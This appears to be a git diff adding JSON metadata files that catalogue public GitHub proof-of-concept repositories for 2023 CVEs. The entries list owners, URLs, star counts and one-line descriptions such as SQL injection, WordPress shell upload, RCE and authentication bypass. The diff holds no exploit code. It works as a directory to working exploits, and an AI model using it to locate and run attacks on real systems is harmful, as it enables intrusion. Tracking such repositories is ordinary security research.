at end of file diff --git a/2023/CVE-2023-51810.json b/2023/CVE-2023-51810.json new file mode 100644 index 0000000000..5ee7185479 --- /dev/null +++ b/2023/CVE-2023-51810.json @@ -0,0 +1,33 @@ +[ + { + "id": 741587636, + "name": "CVE-2023-51810", + "full_name": "Pastea\/CVE-2023-51810", + "owner": { + "login": "Pastea", + "id": 24623933, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24623933?v=4", + "html_url": "https:\/\/github.com\/Pastea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pastea\/CVE-2023-51810", + "description": null, + "fork": false, + "created_at": "2024-01-10T17:47:54Z", + "updated_at": "2024-01-11T18:15:29Z", + "pushed_at": "2024-01-15T15:08:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5204.json b/2023/CVE-2023-5204.json new file mode 100644 index 0000000000..778bd730fd --- /dev/null +++ b/2023/CVE-2023-5204.json @@ -0,0 +1,33 @@ +[ + { + "id": 761333708, + "name": "CVE-2023-5204", + "full_name": "RandomRobbieBF\/CVE-2023-5204", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5204", + "description": "AI ChatBot <= 4.8.9 - Unauthenticated SQL Injection via qc_wpbo_search_response", + "fork": false, + "created_at": "2024-02-21T17:14:15Z", + "updated_at": "2024-10-18T17:58:16Z", + "pushed_at": "2024-02-21T17:15:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52160.json b/2023/CVE-2023-52160.json new file mode 100644 index 0000000000..17710d530e --- /dev/null +++ b/2023/CVE-2023-52160.json @@ -0,0 +1,33 @@ +[ + { + "id": 763514094, + "name": "eap_pwn", + "full_name": "Helica-core\/eap_pwn", + "owner": { + "login": "Helica-core", + "id": 8072457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8072457?v=4", + "html_url": "https:\/\/github.com\/Helica-core", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Helica-core\/eap_pwn", + "description": "poc of CVE-2023-52160", + "fork": false, + "created_at": "2024-02-26T12:48:07Z", + "updated_at": "2024-09-02T08:32:31Z", + "pushed_at": "2024-02-26T12:51:54Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5217.json b/2023/CVE-2023-5217.json new file mode 100644 index 0000000000..6382b91e76 --- /dev/null +++ b/2023/CVE-2023-5217.json @@ -0,0 +1,95 @@ +[ + { + "id": 701187998, + "name": "cve-2023-5217-poc", + "full_name": "UT-Security\/cve-2023-5217-poc", + "owner": { + "login": "UT-Security", + "id": 142931531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142931531?v=4", + "html_url": "https:\/\/github.com\/UT-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UT-Security\/cve-2023-5217-poc", + "description": "A PoC to trigger CVE-2023-5217 from the Browser WebCodecs or MediaRecorder interface.", + "fork": false, + "created_at": "2023-10-06T05:46:16Z", + "updated_at": "2024-08-26T17:42:58Z", + "pushed_at": "2023-10-11T04:30:03Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 701294663, + "name": "platform_external_libvpx_v1.8.0_CVE-2023-5217", + "full_name": "Trinadh465\/platform_external_libvpx_v1.8.0_CVE-2023-5217", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_external_libvpx_v1.8.0_CVE-2023-5217", + "description": null, + "fork": false, + "created_at": "2023-10-06T10:43:38Z", + "updated_at": "2023-10-06T10:45:57Z", + "pushed_at": "2023-10-06T10:46:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 701301269, + "name": "platform_external_libvpx_v1.4.0_CVE-2023-5217", + "full_name": "Trinadh465\/platform_external_libvpx_v1.4.0_CVE-2023-5217", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_external_libvpx_v1.4.0_CVE-2023-5217", + "description": null, + "fork": false, + "created_at": "2023-10-06T11:01:08Z", + "updated_at": "2023-10-06T11:04:35Z", + "pushed_at": "2023-10-06T11:05:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52251.json b/2023/CVE-2023-52251.json new file mode 100644 index 0000000000..7bdd1ace3c --- /dev/null +++ b/2023/CVE-2023-52251.json @@ -0,0 +1,38 @@ +[ + { + "id": 739727093, + "name": "CVE-2023-52251-POC", + "full_name": "BobTheShoplifter\/CVE-2023-52251-POC", + "owner": { + "login": "BobTheShoplifter", + "id": 22559547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22559547?v=4", + "html_url": "https:\/\/github.com\/BobTheShoplifter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BobTheShoplifter\/CVE-2023-52251-POC", + "description": "CVE-2023-52251 There is a Remote Code Execution vulnerability provectus\/kafka-ui.", + "fork": false, + "created_at": "2024-01-06T11:07:36Z", + "updated_at": "2024-10-29T09:37:06Z", + "pushed_at": "2024-01-23T19:06:14Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-52251", + "kafka-ui", + "poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52268.json b/2023/CVE-2023-52268.json new file mode 100644 index 0000000000..b5fd98e0dc --- /dev/null +++ b/2023/CVE-2023-52268.json @@ -0,0 +1,33 @@ +[ + { + "id": 871811221, + "name": "CVE-2023-52268", + "full_name": "squ1dw3rm\/CVE-2023-52268", + "owner": { + "login": "squ1dw3rm", + "id": 87349040, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87349040?v=4", + "html_url": "https:\/\/github.com\/squ1dw3rm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/squ1dw3rm\/CVE-2023-52268", + "description": "Authentication Bypass for FreeScout End-User Portal", + "fork": false, + "created_at": "2024-10-13T02:17:03Z", + "updated_at": "2024-10-13T02:50:46Z", + "pushed_at": "2024-10-13T02:50:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52654.json b/2023/CVE-2023-52654.json new file mode 100644 index 0000000000..d67a97a3e6 --- /dev/null +++ b/2023/CVE-2023-52654.json @@ -0,0 +1,33 @@ +[ + { + "id": 798468145, + "name": "CVE-2023-52654", + "full_name": "FoxyProxys\/CVE-2023-52654", + "owner": { + "login": "FoxyProxys", + "id": 166161106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4", + "html_url": "https:\/\/github.com\/FoxyProxys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2023-52654", + "description": null, + "fork": false, + "created_at": "2024-05-09T20:53:03Z", + "updated_at": "2024-05-09T21:25:58Z", + "pushed_at": "2024-05-09T21:25:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52709.json b/2023/CVE-2023-52709.json new file mode 100644 index 0000000000..e504649909 --- /dev/null +++ b/2023/CVE-2023-52709.json @@ -0,0 +1,33 @@ +[ + { + "id": 825866082, + "name": "CVE-2023-52709-PoC", + "full_name": "KevinMitchell-OSWP-CISSP\/CVE-2023-52709-PoC", + "owner": { + "login": "KevinMitchell-OSWP-CISSP", + "id": 15947372, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15947372?v=4", + "html_url": "https:\/\/github.com\/KevinMitchell-OSWP-CISSP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KevinMitchell-OSWP-CISSP\/CVE-2023-52709-PoC", + "description": "PoC for 2023-52709 - TI Bluetooth stack can fail to generate a resolvable Random Private Address (RPA) leading to DoS for already bonded peer devices. ", + "fork": false, + "created_at": "2024-07-08T16:48:29Z", + "updated_at": "2024-10-17T03:53:01Z", + "pushed_at": "2024-09-26T15:27:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5324.json b/2023/CVE-2023-5324.json new file mode 100644 index 0000000000..657e502d91 --- /dev/null +++ b/2023/CVE-2023-5324.json @@ -0,0 +1,33 @@ +[ + { + "id": 698743355, + "name": "eero-zero-length-ipv6-options-header-dos", + "full_name": "nomis\/eero-zero-length-ipv6-options-header-dos", + "owner": { + "login": "nomis", + "id": 70171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70171?v=4", + "html_url": "https:\/\/github.com\/nomis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nomis\/eero-zero-length-ipv6-options-header-dos", + "description": "eeroOS Ethernet Interface Denial of Service Vulnerability (CVE-2023-5324)", + "fork": false, + "created_at": "2023-09-30T20:32:51Z", + "updated_at": "2024-08-22T12:20:43Z", + "pushed_at": "2023-10-01T08:03:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5360.json b/2023/CVE-2023-5360.json new file mode 100644 index 0000000000..fbbd9b56c0 --- /dev/null +++ b/2023/CVE-2023-5360.json @@ -0,0 +1,269 @@ +[ + { + "id": 708041487, + "name": "CVE-2023-5360", + "full_name": "sagsooz\/CVE-2023-5360", + "owner": { + "login": "sagsooz", + "id": 38169010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38169010?v=4", + "html_url": "https:\/\/github.com\/sagsooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sagsooz\/CVE-2023-5360", + "description": "CVE-2023-5360 Auto Shell Upload WordPress Royal Elementor 1.3.78 Shell Upload", + "fork": false, + "created_at": "2023-10-21T10:51:08Z", + "updated_at": "2024-07-02T11:49:48Z", + "pushed_at": "2023-10-21T10:52:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710171154, + "name": "Worpress-CVE-2023-5360", + "full_name": "phankz\/Worpress-CVE-2023-5360", + "owner": { + "login": "phankz", + "id": 137556272, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137556272?v=4", + "html_url": "https:\/\/github.com\/phankz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phankz\/Worpress-CVE-2023-5360", + "description": null, + "fork": false, + "created_at": "2023-10-26T06:56:48Z", + "updated_at": "2024-07-07T07:39:44Z", + "pushed_at": "2023-11-30T07:36:57Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710202087, + "name": "CVE-2023-5360", + "full_name": "nastar-id\/CVE-2023-5360", + "owner": { + "login": "nastar-id", + "id": 57721604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4", + "html_url": "https:\/\/github.com\/nastar-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nastar-id\/CVE-2023-5360", + "description": "CVE-2023-5360", + "fork": false, + "created_at": "2023-10-26T08:18:43Z", + "updated_at": "2023-10-26T08:19:55Z", + "pushed_at": "2023-10-26T08:26:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713201054, + "name": "CVE-2023-5360", + "full_name": "Chocapikk\/CVE-2023-5360", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-5360", + "description": "Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360.", + "fork": false, + "created_at": "2023-11-02T03:15:44Z", + "updated_at": "2024-08-12T20:32:58Z", + "pushed_at": "2023-11-02T17:57:55Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-5360", + "exploit", + "hacking", + "infosec", + "open-source", + "penetration-testing", + "python", + "remote-code-execution", + "royal-elementor-addons", + "vulnerability", + "web-security", + "wordpress" + ], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 713204555, + "name": "CVE-2023-5360", + "full_name": "tucommenceapousser\/CVE-2023-5360", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-5360", + "description": "Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360.", + "fork": false, + "created_at": "2023-11-02T03:28:59Z", + "updated_at": "2024-05-26T21:10:38Z", + "pushed_at": "2023-11-10T07:15:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 713655566, + "name": "WP-CVE-2023-5360", + "full_name": "Jenderal92\/WP-CVE-2023-5360", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/WP-CVE-2023-5360", + "description": "Wordpress CVE-2023-5360", + "fork": false, + "created_at": "2023-11-03T00:58:36Z", + "updated_at": "2024-11-17T23:52:22Z", + "pushed_at": "2024-11-17T23:43:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bot-auto-upload", + "bot-scanner-python", + "cve-2023-5360", + "exploit", + "exploit-2023" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714734993, + "name": "CVE-2023-5360", + "full_name": "Pushkarup\/CVE-2023-5360", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-5360", + "description": "The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.", + "fork": false, + "created_at": "2023-11-05T18:02:59Z", + "updated_at": "2024-08-26T21:06:11Z", + "pushed_at": "2023-11-05T18:40:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736211346, + "name": "CVE-2023-5360-PoC", + "full_name": "angkerithhack001\/CVE-2023-5360-PoC", + "owner": { + "login": "angkerithhack001", + "id": 142613644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142613644?v=4", + "html_url": "https:\/\/github.com\/angkerithhack001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angkerithhack001\/CVE-2023-5360-PoC", + "description": "CVE-2023-5360 EXPLOIT ", + "fork": false, + "created_at": "2023-12-27T09:32:05Z", + "updated_at": "2023-12-27T09:33:00Z", + "pushed_at": "2023-12-27T09:32:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5412.json b/2023/CVE-2023-5412.json new file mode 100644 index 0000000000..a100f54900 --- /dev/null +++ b/2023/CVE-2023-5412.json @@ -0,0 +1,33 @@ +[ + { + "id": 712341472, + "name": "CVE-2023-5412", + "full_name": "RandomRobbieBF\/CVE-2023-5412", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5412", + "description": "Image horizontal reel scroll slideshow <= 13.2 - Authenticated (Subscriber+) SQL Injection via Shortcode", + "fork": false, + "created_at": "2023-10-31T09:26:21Z", + "updated_at": "2024-08-12T20:32:57Z", + "pushed_at": "2023-10-31T09:32:33Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5521.json b/2023/CVE-2023-5521.json new file mode 100644 index 0000000000..2ab113fe6d --- /dev/null +++ b/2023/CVE-2023-5521.json @@ -0,0 +1,33 @@ +[ + { + "id": 703526370, + "name": "CVE-2023-5521", + "full_name": "Ylarod\/CVE-2023-5521", + "owner": { + "login": "Ylarod", + "id": 30978685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30978685?v=4", + "html_url": "https:\/\/github.com\/Ylarod", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ylarod\/CVE-2023-5521", + "description": "Root takeover via signature spoofing in KernelSU", + "fork": false, + "created_at": "2023-10-11T12:08:31Z", + "updated_at": "2024-11-26T18:44:53Z", + "pushed_at": "2023-10-11T12:34:37Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5538.json b/2023/CVE-2023-5538.json new file mode 100644 index 0000000000..df450a750d --- /dev/null +++ b/2023/CVE-2023-5538.json @@ -0,0 +1,33 @@ +[ + { + "id": 703812630, + "name": "MpOperationLogs", + "full_name": "juweihuitao\/MpOperationLogs", + "owner": { + "login": "juweihuitao", + "id": 110007292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110007292?v=4", + "html_url": "https:\/\/github.com\/juweihuitao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/juweihuitao\/MpOperationLogs", + "description": "CVE-2023-5538 - MpOperationLogs <= 1.0.1 - 未经身份验证的存储跨站点脚本", + "fork": false, + "created_at": "2023-10-12T01:15:09Z", + "updated_at": "2023-10-12T01:15:09Z", + "pushed_at": "2023-10-12T01:49:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5539.json b/2023/CVE-2023-5539.json new file mode 100644 index 0000000000..725b8d41d0 --- /dev/null +++ b/2023/CVE-2023-5539.json @@ -0,0 +1,33 @@ +[ + { + "id": 706569887, + "name": "CVE-2023-5539", + "full_name": "cli-ish\/CVE-2023-5539", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-5539", + "description": null, + "fork": false, + "created_at": "2023-10-18T07:58:25Z", + "updated_at": "2023-10-18T07:58:25Z", + "pushed_at": "2023-10-18T07:58:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5540.json b/2023/CVE-2023-5540.json new file mode 100644 index 0000000000..a3d34315d5 --- /dev/null +++ b/2023/CVE-2023-5540.json @@ -0,0 +1,33 @@ +[ + { + "id": 706569939, + "name": "CVE-2023-5540", + "full_name": "cli-ish\/CVE-2023-5540", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-5540", + "description": null, + "fork": false, + "created_at": "2023-10-18T07:58:33Z", + "updated_at": "2023-10-18T07:58:33Z", + "pushed_at": "2023-10-18T07:58:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5546.json b/2023/CVE-2023-5546.json new file mode 100644 index 0000000000..83eba2b72b --- /dev/null +++ b/2023/CVE-2023-5546.json @@ -0,0 +1,33 @@ +[ + { + "id": 681157074, + "name": "CVE-2023-5546", + "full_name": "obelia01\/CVE-2023-5546", + "owner": { + "login": "obelia01", + "id": 82713832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82713832?v=4", + "html_url": "https:\/\/github.com\/obelia01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/obelia01\/CVE-2023-5546", + "description": null, + "fork": false, + "created_at": "2023-08-21T11:50:01Z", + "updated_at": "2023-08-21T11:50:02Z", + "pushed_at": "2023-08-21T11:50:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5561.json b/2023/CVE-2023-5561.json new file mode 100644 index 0000000000..51d447a0da --- /dev/null +++ b/2023/CVE-2023-5561.json @@ -0,0 +1,33 @@ +[ + { + "id": 731244611, + "name": "CVE-2023-5561-PoC", + "full_name": "pog007\/CVE-2023-5561-PoC", + "owner": { + "login": "pog007", + "id": 124298592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124298592?v=4", + "html_url": "https:\/\/github.com\/pog007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pog007\/CVE-2023-5561-PoC", + "description": "WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack", + "fork": false, + "created_at": "2023-12-13T16:43:18Z", + "updated_at": "2024-09-04T06:48:57Z", + "pushed_at": "2023-12-13T16:47:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5717.json b/2023/CVE-2023-5717.json new file mode 100644 index 0000000000..0e5f80f17e --- /dev/null +++ b/2023/CVE-2023-5717.json @@ -0,0 +1,33 @@ +[ + { + "id": 747097463, + "name": "CVE-2023-5717", + "full_name": "uthrasri\/CVE-2023-5717", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-5717", + "description": null, + "fork": false, + "created_at": "2024-01-23T09:04:00Z", + "updated_at": "2024-01-23T09:07:21Z", + "pushed_at": "2024-01-23T09:08:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5720.json b/2023/CVE-2023-5720.json new file mode 100644 index 0000000000..a44d1a08ca --- /dev/null +++ b/2023/CVE-2023-5720.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209592, + "name": "CVE-2023-5720-2", + "full_name": "miguelc49\/CVE-2023-5720-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:31Z", + "updated_at": "2024-04-14T17:41:22Z", + "pushed_at": "2024-04-15T22:42:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209609, + "name": "CVE-2023-5720-1", + "full_name": "miguelc49\/CVE-2023-5720-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-5720-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:35Z", + "updated_at": "2024-04-14T17:41:20Z", + "pushed_at": "2024-04-15T19:58:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": 